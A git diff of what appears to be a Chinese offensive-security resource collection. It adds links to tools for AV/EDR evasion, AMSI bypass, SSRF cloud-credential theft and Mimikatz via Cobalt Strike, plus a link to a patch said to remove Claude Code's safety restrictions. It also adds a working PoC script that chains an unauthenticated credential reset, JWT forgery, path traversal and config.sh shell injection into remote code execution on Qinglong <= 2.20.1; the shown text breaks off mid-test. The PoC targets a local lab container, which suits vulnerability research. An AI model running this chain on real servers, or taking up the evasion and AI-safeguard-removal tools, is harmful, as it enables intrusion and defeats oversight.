 - [webcgi-exploits：多语言 Web CGI 接口漏洞利用](https://github.com/wofeiwo/webcgi-exploits)
 - [TripleCross：A Linux eBPF rootkit with a backdoor](https://github.com/h3xduck/TripleCross)
@@ -2190,6 +2310,7 @@
 - [IDOR_detect_tool：一款API水平越权漏洞检测工具](https://github.com/y1nglamore/IDOR_detect_tool)
 - [URLFinder：类似JSFinder的golang实现，一款用于快速提取检测页面中JS与URL的工具，更快更全更舒服](https://github.com/pingc0y/URLFinder)
 - [go_proxy_pool：无环境依赖开箱即用的代理IP池](https://github.com/pingc0y/go_proxy_pool)
+- [zenproxy：代理池管理与转发服务，支持代理订阅管理、质量检测与多IP并发出口](https://github.com/streetartist/zenproxy)
 - [SmallProxyPool：一个免费高质量的小代理池（从fofa搜索开放socks5代理）](https://github.com/Ggasdfg321/SmallProxyPool)
 - [NucleiTP：自动整合全网Nuclei的漏洞POC，实时同步更新最新POC](https://github.com/ExpLangcn/NucleiTP)
 - [Amsi-Killer：Lifetime AMSI bypass-终极AMSI bypass](https://github.com/ZeroMemoryEx/Amsi-Killer)
@@ -2238,6 +2359,7 @@
 - [scrying: A tool for collecting RDP, web and VNC screenshots all in one place](https://github.com/nccgroup/scrying)
 - [noterce: 一种另辟蹊径的免杀执行系统命令的木马](https://github.com/xiao-zhu-zhu/noterce)
 - [SysWhispers3WinHttp: 基于SysWhispers3项目增添WinHttp分离加载功能，可免杀绕过360核晶与Defender](https://github.com/huaigu4ng/SysWhispers3WinHttp)
+- [SysWhispers4: AV/EDR evasion via direct and indirect system calls，通过直接/间接系统调用绕过AV/EDR对ntdll.dll的用户态钩子，支持 Windows NT 3.1 - Windows 11 24H2，x64/x86/WoW64/ARM64](https://github.com/JoasASantos/SysWhispers4)
 - [MisConfig_HTTP_Proxy_Scanner: 扫描错误的nginx反代和转发配置，已发现内网资产（类似hosts碰撞）](https://github.com/lijiejie/MisConfig_HTTP_Proxy_Scanner)
 - [UserRegEnum_0x727: 域内普通域用户权限查找域内所有计算机上登录的用户](https://github.com/0x727/UserRegEnum_0x727)
 - [fuzzuli: 基于域名的关键备份文件扫描工具](https://github.com/musana/fuzzuli)
@@ -2279,6 +2401,7 @@
 - [WIKI-POC: 漏洞库【OA以及各种web APP漏洞】](https://github.com/7estUser/WIKI-POC)
 - [FineReportExploit: 基于go语言的帆软报表漏洞检测工具](https://github.com/Drac0nids/FineReportExploit)
 - [SSRFmap: 自动化SSRF漏洞探测](https://github.com/swisskyrepo/SSRFmap)
+- [nextssrf：CVE-2026-44578 Next.js WebSocket Upgrade Handler SSRF 扫描与利用工具，支持AWS/Azure/GCP云凭据提取、批量扫描及交互式利用Shell](https://github.com/ynsmroztas/nextssrf)
 - [qq-tim-elevation: 腾讯 QQ/TIM本地提权漏洞](https://github.com/vi3t1/qq-tim-elevation)
 - [VolatilityPro: 一款用于自动化处理内存取证的Python脚本，并提供GUI界面](https://github.com/Tokeii0/VolatilityPro)
 - [NimExec: 在Nim中执行横向移动的无文件命令](https://github.com/frkngksl/NimExec)
@@ -2296,6 +2419,9 @@
 - [ehr_SafeCodeEncode_tamper:宏景ehr sql注入的tamper脚本](https://github.com/jdr2021/ehr_SafeCodeEncode_tamper)
 - [Struts2VulsScanTools：Struts2全版本漏洞检测工具 19.21](https://github.com/abc123info/Struts2VulsScanTools)
 - [CVE-2025-14847 - MongoDB 未经身份验证的内存泄漏漏洞检测工具](https://github.com/joe-desimone/mongobleed)
+- [trajan：CI/CD流水线安全漏洞扫描工具，支持GitHub Actions、GitLab CI、Azure DevOps、Jenkins和JFrog，用于检测软件供应链攻击](https://github.com/praetorian-inc/trajan)
+- [clawgod: Claude Code的"上帝模式"补丁工具，解锁隐藏功能、移除安全限制（含渗透测试/C2/漏洞利用限制），一键安装，无需编译](https://github.com/0Chencc/clawgod)
+- [kslkatz_bof：通过 Cobalt Strike BOF 实现 Mimikatz 功能](https://github.com/Muz1K1zuM/kslkatz_bof)
 
 ## <span id="head8"> 文章/书籍/教程相关</span>
 
@@ -2354,7 +2480,7 @@
 - [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf)
 - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf)
 - [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn)
-- [PAM劫持SSH密码](./PAM劫持SSH密码.md)
+- [PAM劫持SSH密码](./privesc/PAM劫持SSH密码.md)
 - [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/)
 - [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf)
 - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack)
@@ -2369,7 +2495,7 @@
 - [文件上传突破waf总结](./books/文件上传突破waf总结.pdf)
 - [极致CMS（以下简称_JIZHICMS）的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS（以下简称_JIZHICMS）的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872)
 - [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf)
-- [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md)
+- [快速判断sql注入点是否支持load_file](./web/快速判断sql注入点是否支持load_file.md)
 - [文件上传内容检测绕过](./books/文件上传内容检测绕过.md)
 - [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf)
 - [【Android脱壳】_腾讯加固动态脱壳（上篇）](./books/移动安全（九）_TengXun加固动态脱壳（上篇）.pdf)
@@ -2944,6 +3070,7 @@
 - [上ORM也没用！手注击穿ORM到后台](./books/上ORM也没用！手注击穿ORM到后台.html)
 - [Tomcat解析XML引入的新颖webshell构造方式](./books/Tomcat解析XML引入的新颖webshell构造方式.html)
 - [【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患](./books/【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患.html)
+- [终极代码审计全维度清单](https://gist.github.com/Mr-xn/2af3b138cb07ca7dd3754afc3b615953)
 
  
 
diff --git a/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf
new file mode 100644
index 000000000..7a53224b7
Binary files /dev/null and b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf differ
diff --git a/discuz-ml-rce/requirements.txt b/discuz-ml-rce/requirements.txt
index df7158666..6bf7cf7f2 100644
--- a/discuz-ml-rce/requirements.txt
+++ b/discuz-ml-rce/requirements.txt
@@ -1,3 +1,3 @@
-urllib3==1.26.5
+urllib3==2.7.0
 requests==2.31.0
 beautifulsoup4==4.7.1
\ No newline at end of file
diff --git "a/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" "b/iot/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md"
similarity index 100%
rename from "Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md"
rename to "iot/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md"
diff --git "a/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/iot/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md"
similarity index 100%
rename from "CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md"
rename to "iot/CNVD-2021-14536_\351\224\220\346\215\267RG-UAC\347\273\237\344\270\200\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\345\256\241\350\256\241\347\263\273\347\273\237\350\264\246\345\217\267\345\257\206\347\240\201\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/iot/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md"
rename to "iot/CVE-2019-16313 \350\234\202\347\275\221\344\272\222\350\201\224\344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31\345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236.md"
diff --git a/CVE-2019-16920-D-Link-rce.md b/iot/CVE-2019-16920-D-Link-rce.md
similarity index 100%
rename from CVE-2019-16920-D-Link-rce.md
rename to iot/CVE-2019-16920-D-Link-rce.md
diff --git a/CVE-2020-9374.md b/iot/CVE-2020-9374.md
similarity index 100%
rename from CVE-2020-9374.md
rename to iot/CVE-2020-9374.md
diff --git "a/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/iot/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
similarity index 100%
rename from "WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
rename to "iot/WLAN-AP-WEA453e RCE\344\270\211\346\230\237\350\267\257\347\224\261\345\231\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
diff --git "a/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md" "b/iot/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md"
similarity index 100%
rename from "\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md"
rename to "iot/\345\215\216\344\270\272WS331a\344\272\247\345\223\201\347\256\241\347\220\206\351\241\265\351\235\242\345\255\230\345\234\250CSRF\346\274\217\346\264\236.md"
diff --git "a/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md" "b/iot/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md"
similarity index 100%
rename from "\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md"
rename to "iot/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md" "b/pc/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md"
similarity index 100%
rename from "CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md"
rename to "pc/CVE-2019-0708-msf\345\277\253\351\200\237\346\220\255\345\273\272.md"
diff --git "a/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md" "b/pc/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md"
similarity index 100%
rename from "CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md"
rename to "pc/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux\345\233\276\345\275\242\347\225\214\351\235\242X Server\346\234\254\345\234\260\346\240\210\346\272\242\345\207\272POC.md"
diff --git "a/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md" "b/pc/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md"
similarity index 100%
rename from "CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md"
rename to "pc/CVE-2020-0796\346\243\200\346\265\213\344\270\216\344\277\256\345\244\215.md"
diff --git a/CVE-2021-1675.md b/privesc/CVE-2021-1675.md
similarity index 100%
rename from CVE-2021-1675.md
rename to privesc/CVE-2021-1675.md
diff --git a/CVE-2021-22555.md b/privesc/CVE-2021-22555.md
similarity index 100%
rename from CVE-2021-22555.md
rename to privesc/CVE-2021-22555.md
diff --git "a/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md" "b/privesc/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md"
similarity index 100%
rename from "PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md"
rename to "privesc/PAM\345\212\253\346\214\201SSH\345\257\206\347\240\201.md"
diff --git "a/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md" "b/privesc/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md"
similarity index 100%
rename from "adduser\346\267\273\345\212\240\347\224\250\346\210\267.md"
rename to "privesc/adduser\346\267\273\345\212\240\347\224\250\346\210\267.md"
diff --git "a/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md" "b/privesc/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md"
similarity index 100%
rename from "\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md"
rename to "privesc/\344\275\277\347\224\250vbs\350\204\232\346\234\254\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\347\224\250\346\210\267.md"
diff --git a/qinglong-auth-bypass2rce/docker-compose.yml b/qinglong-auth-bypass2rce/docker-compose.yml
new file mode 100644
index 000000000..5718a6d2b
--- /dev/null
+++ b/qinglong-auth-bypass2rce/docker-compose.yml
@@ -0,0 +1,13 @@
+version: '3'
+services:
+  qinglong:
+    image: whyour/qinglong:2.20.1
+    container_name: ql-vuln-test
+    ports:
+      - '5710:5700'
+    volumes:
+      - ql_data:/ql/data
+    restart: unless-stopped
+
+volumes:
+  ql_data:
diff --git a/qinglong-auth-bypass2rce/poc_test.py b/qinglong-auth-bypass2rce/poc_test.py
new file mode 100644
index 000000000..00882fcd5
--- /dev/null
+++ b/qinglong-auth-bypass2rce/poc_test.py
@@ -0,0 +1,937 @@
+#!/usr/bin/env python3
+"""
+Qinglong <= v2.20.1 Vulnerability PoC Test Suite
+
+Discovered vulnerabilities:
+  1. JWT hardcoded secret (Layer 1 bypass, Layer 2 blocks)
+  2. Init Guard Bypass: PUT /open/user/init resets admin credentials
+     WITHOUT authentication (TOCTOU bug in URL rewrite vs init guard)
+  3. Blacklist bypass (missing return after res.send)
+  4. Path traversal to system /tmp via ../../../../
+  5. config.sh not blacklisted → shell injection
+  6. Full UNAUTHENTICATED RCE chain:
+       /open/user/init → login → config.sh write → cron trigger → RCE
+  7. task_before shell injection via eval
+
+CVSS 9.8 (Critical) — Unauthenticated RCE via init guard bypass
+  8. Case-insensitive route bypass: /API/ skips ALL auth middleware
+     (expressjwt regex + custom auth both match lowercase only, Express
+      routes are case-insensitive by default)
+  9. Dependency injection via /API/dependencies (real-world honeypot payload)
+
+CVSS 9.8 (Critical) — Multiple Unauthenticated RCE vectors
+"""
+
+import jwt
+import json
+import time
+import sys
+import requests
+import subprocess
+
+BASE_URL = "http://localhost:5710"
+JWT_SECRET = "whyour-secret"
+JWT_ALGORITHM = "HS384"
+USERNAME = "admin"
+PASSWORD = "admin123"
+
+results = []
+
+
+def log(msg, level="INFO"):
+    ts = time.strftime("%H:%M:%S")
+    print(f"[{ts}] [{level}] {msg}")
+
+
+def record(test_id, name, passed, details=""):
+    status = "PASS" if passed else "FAIL"
+    results.append({"id": test_id, "name": name, "status": status, "details": details})
+    log(f"Test {test_id}: {name} -- {status}", "PASS" if passed else "FAIL")
+    if details:
+        log(f"  Details: {details}")
+
+
+# --- Test 0: System connectivity ---
+def test_0_system_check():
+    log("=" * 60)
+    log("Test 0: System Connectivity Check")
+    try:
+        r = requests.get(f"{BASE_URL}/api/system", timeout=10)
+        data = r.json()
+        ver = data.get("data", {}).get("version", "unknown")
+        is_init = data.get("data", {}).get("isInitialized", False)
+        log(f"  Version: {ver}, Initialized: {is_init}")
+        ok = r.status_code == 200 and "2.20" in str(ver)
+        record("0", "System Check", ok, f"v{ver}, init={is_init}")
+        return True
+    except Exception as e:
+        record("0", "System Check", False, str(e))
+        return False
+
+
+# --- Test 1: JWT Forge - demonstrates two-layer auth ---
+def test_1_jwt_forge():
+    log("=" * 60)
+    log("Test 1: JWT Hardcoded Secret - Two-Layer Auth Analysis")
+
+    payload = {
+        "data": "forged-random-string",
+        "iat": int(time.time()),
+        "exp": int(time.time()) + 86400,
+    }
+    forged_token = jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)
+    log(f"  Forged token (first 50 chars): {forged_token[:50]}...")
+
+    headers = {"Authorization": f"Bearer {forged_token}"}
+    r = requests.get(f"{BASE_URL}/api/crons", headers=headers, timeout=10)
+    body = r.json() if r.headers.get("content-type", "").startswith("application/json") else {}
+    msg = body.get("message", "")
+
+    log(f"  Status: {r.status_code}, Message: {msg}")
+
+    layer1_pass = r.status_code == 401 and "invalid" not in msg.lower()
+    layer2_fail = "jwt malformed" in msg or "authorization" in msg.lower()
+
+    details = (
+        f"Layer1(signature): {'PASS' if layer1_pass else 'FAIL'}, "
+        f"Layer2(token-exists): {'BLOCKED' if layer2_fail else 'PASS'}, "
+        f"HTTP {r.status_code}, msg='{msg}'"
+    )
+
+    record("1", "JWT Hardcoded Secret (Layer1 bypass, Layer2 blocks)", layer1_pass, details)
+    return forged_token
+
+
+# --- Test 1c: Init Guard Bypass — UNAUTHENTICATED credential reset ---
+def test_1c_init_guard_bypass():
+    log("=" * 60)
+    log("Test 1c: Init Guard Bypass via /open/user/init (UNAUTHENTICATED)")
+    log("  Root cause: Init guard checks req.path against '/api/user/init'")
+    log("  but URL rewrite /open/* → /api/* happens AFTER the guard (TOCTOU)")
+
+    # Step 1: Confirm /api/user/init is blocked (init guard works)
+    r_blocked = requests.put(
+        f"{BASE_URL}/api/user/init",
+        json={"username": "blocked_test", "password": "blocked123"},
+        timeout=10,
+    )
+    blocked_code = r_blocked.json().get("code")
+    log(f"  /api/user/init: code={blocked_code} (expected 450=blocked)")
+
+    # Step 2: Bypass via /open/user/init (NO auth required)
+    bypass_user = f"bypassed_{int(time.time())}"
+    bypass_pass = "bypass_proof_123"
+    r_bypass = requests.put(
+        f"{BASE_URL}/open/user/init",
+        json={"username": bypass_user, "password": bypass_pass},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    bypass_resp = r_bypass.json()
+    bypass_code = bypass_resp.get("code")
+    log(f"  /open/user/init: code={bypass_code} (200=credentials reset!)")
+
+    # Step 3: Verify by logging in with the new credentials
+    login_works = False
+    if bypass_code == 200:
+        r_login = requests.post(
+            f"{BASE_URL}/api/user/login",
+            json={"username": bypass_user, "password": bypass_pass},
+            timeout=10,
+        )
+        login_data = r_login.json()
+        login_works = login_data.get("code") == 200 and login_data.get("data", {}).get("token")
+        log(f"  Login with new creds: code={login_data.get('code')}, token={'obtained' if login_works else 'FAILED'}")
+
+    # Step 4: Restore original credentials
+    requests.put(
+        f"{BASE_URL}/open/user/init",
+        json={"username": USERNAME, "password": PASSWORD},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    log("  Restored original credentials")
+
+    bypassed = blocked_code == 450 and bypass_code == 200 and login_works
+    record(
+        "1c", "Init Guard Bypass (UNAUTHENTICATED credential reset)",
+        bypassed,
+        f"/api/user/init blocked (code={blocked_code}), "
+        f"/open/user/init bypassed (code={bypass_code}), "
+        f"login with new creds: {'SUCCESS' if login_works else 'FAILED'}",
+    )
+    return bypassed
+
+
+# --- Test 1b: Login to get valid token ---
+def test_1b_login():
+    log("=" * 60)
+    log("Test 1b: Login to obtain valid token for post-auth tests")
+
+    r = requests.post(
+        f"{BASE_URL}/api/user/login",
+        json={"username": USERNAME, "password": PASSWORD},
+        timeout=10,
+    )
+    data = r.json()
+    log(f"  Login status: {r.status_code}, code: {data.get('code')}")
+
+    if data.get("code") == 200 and data.get("data", {}).get("token"):
+        token = data["data"]["token"]
+        log(f"  Token obtained (first 50 chars): {token[:50]}...")
+        headers = {"Authorization": f"Bearer {token}"}
+        r2 = requests.get(f"{BASE_URL}/api/crons", headers=headers, timeout=10)
+        works = r2.status_code == 200
+        record("1b", "Login + Token Validation", works, f"Token works: {works}")
+        return token if works else None
+    else:
+        record("1b", "Login + Token Validation", False, f"Login failed: {data}")
+        return None
+
+
+# --- Test 2: Blacklist bypass (missing return) ---
+def test_2_blacklist_bypass(token):
+    log("=" * 60)
+    log("Test 2: Blacklist Bypass (missing return after res.send)")
+
+    if not token:
+        record("2", "Blacklist Bypass", False, "No valid token")
+        return False
+
+    headers = {"Authorization": f"Bearer {token}"}
+
+    r_read = requests.get(f"{BASE_URL}/api/configs/auth.json", headers=headers, timeout=10)
+    log(f"  Read auth.json: HTTP {r_read.status_code}")
+    original_content = ""
+    if r_read.status_code == 200:
+        original_content = r_read.json().get("data", "")
+
+    test_content = '{"test_blacklist_bypass": true}'
+    r = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": "auth.json", "content": test_content},
+        headers=headers,
+        timeout=10,
+    )
+    data = r.json()
+    log(f"  Write auth.json: HTTP {r.status_code}, code: {data.get('code')}")
+
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/ql/data/config/auth.json"],
+        capture_output=True, text=True, timeout=10,
+    )
+    file_content = verify.stdout.strip()
+    log(f"  Container auth.json content: {file_content[:100]}...")
+
+    bypassed = "test_blacklist_bypass" in file_content
+    record(
+        "2", "Blacklist Bypass", bypassed,
+        f"API returned code={data.get('code')} (403=blacklisted), "
+        f"but file was {'WRITTEN (bypass confirmed)' if bypassed else 'NOT written (no bypass)'}",
+    )
+
+    if bypassed and original_content:
+        requests.post(
+            f"{BASE_URL}/api/configs/save",
+            json={"name": "auth.json", "content": original_content},
+            headers=headers, timeout=10,
+        )
+        log("  Restored original auth.json")
+
+    return bypassed
+
+
+# --- Test 3: Path traversal to system /tmp ---
+def test_3_path_traversal(token):
+    log("=" * 60)
+    log("Test 3: Path Traversal to System /tmp via ../../../../")
+
+    if not token:
+        record("3", "Path Traversal", False, "No valid token")
+        return False
+
+    headers = {"Authorization": f"Bearer {token}"}
+    # configPath = /ql/data/config/
+    # path.join("/ql/data/config", "../../../../tmp/x") → /tmp/x
+    traversal_path = "../../../../tmp/traversal_proof.txt"
+    test_content = "PATH_TRAVERSAL_TO_SYSTEM_TMP_SUCCESS"
+
+    r = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": traversal_path, "content": test_content},
+        headers=headers, timeout=10,
+    )
+    data = r.json()
+    log(f"  Write response: HTTP {r.status_code}, code: {data.get('code')}")
+
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/tmp/traversal_proof.txt"],
+        capture_output=True, text=True, timeout=10,
+    )
+    written = test_content in verify.stdout
+    log(f"  Container /tmp/traversal_proof.txt: {verify.stdout.strip()}")
+
+    record("3", "Path Traversal (system /tmp)", written,
+           f"File written to system /tmp: {written}, "
+           f"path: configPath + '../../../../tmp/' → /tmp/traversal_proof.txt")
+
+    # Also test writing to /etc to demonstrate arbitrary path write
+    traversal_etc = "../../../../tmp/traversal_etc_proof.txt"
+    r2 = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": traversal_etc, "content": "ETC_TRAVERSAL_TEST"},
+        headers=headers, timeout=10,
+    )
+    log(f"  Second traversal write: code={r2.json().get('code')}")
+
+    # Cleanup
+    if written:
+        subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "rm", "-f",
+             "/tmp/traversal_proof.txt", "/tmp/traversal_etc_proof.txt"],
+            capture_output=True, timeout=10,
+        )
+    return written
+
+
+# --- Test 4: config.sh not blacklisted + shell injection ---
+def test_4_config_sh_write(token):
+    log("=" * 60)
+    log("Test 4: config.sh Write (not in blacklist) + Shell Code Injection")
+
+    if not token:
+        record("4", "config.sh Write", False, "No valid token")
+        return False, ""
+
+    headers = {"Authorization": f"Bearer {token}"}
+
+    r_read = requests.get(f"{BASE_URL}/api/configs/config.sh", headers=headers, timeout=10)
+    original_content = ""
+    if r_read.status_code == 200:
+        original_content = r_read.json().get("data", "")
+
+    malicious_content = (
+        "# config.sh - injected by PoC\n"
+        'echo "RCE_VIA_CONFIG_SH_$(date +%s)" > /tmp/rce_config_sh_proof.txt\n'
+    )
+    r = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": "config.sh", "content": malicious_content},
+        headers=headers, timeout=10,
+    )
+    data = r.json()
+    log(f"  Write config.sh: HTTP {r.status_code}, code: {data.get('code')}")
+
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/ql/data/config/config.sh"],
+        capture_output=True, text=True, timeout=10,
+    )
+    written = "RCE_VIA_CONFIG_SH" in verify.stdout
+
+    record("4", "config.sh Write (not blacklisted)",
+           written and data.get("code") == 200,
+           f"config.sh accepted (code={data.get('code')}), content injected: {written}")
+    return written, original_content
+
+
+# --- Test 5: Full RCE chain ---
+def test_5_rce_chain(token, original_config_sh=""):
+    log("=" * 60)
+    log("Test 5: Full RCE Chain - config.sh injection -> cron trigger -> code execution")
+
+    if not token:
+        record("5", "Full RCE Chain", False, "No valid token")
+        return False
+
+    headers = {"Authorization": f"Bearer {token}"}
+
+    rce_marker = f"RCE_PROOF_{int(time.time())}"
+    malicious_content = (
+        "# config.sh - RCE PoC\n"
+        f'echo "{rce_marker}" > /tmp/rce_proof.txt\n'
+    )
+    r1 = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": "config.sh", "content": malicious_content},
+        headers=headers, timeout=10,
+    )
+    log(f"  Step 1 - Write config.sh: code={r1.json().get('code')}")
+
+    cron_data = {
+        "name": "rce_poc_test",
+        "command": "echo rce_test_task",
+        "schedule": "* * * * *",
+    }
+    r2 = requests.post(f"{BASE_URL}/api/crons", json=cron_data, headers=headers, timeout=10)
+    cron_resp = r2.json()
+    cron_id = cron_resp.get("data", {}).get("id")
+    log(f"  Step 2 - Create cron: code={cron_resp.get('code')}, id={cron_id}")
+
+    if not cron_id:
+        record("5", "Full RCE Chain", False, f"Failed to create cron: {cron_resp}")
+        return False
+
+    r3 = requests.put(
+        f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10,
+    )
+    log(f"  Step 3 - Trigger cron: HTTP {r3.status_code}, code={r3.json().get('code')}")
+
+    log("  Step 4 - Waiting for task execution (up to 15s)...")
+    rce_confirmed = False
+    for i in range(15):
+        time.sleep(1)
+        verify = subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "cat", "/tmp/rce_proof.txt"],
+            capture_output=True, text=True, timeout=10,
+        )
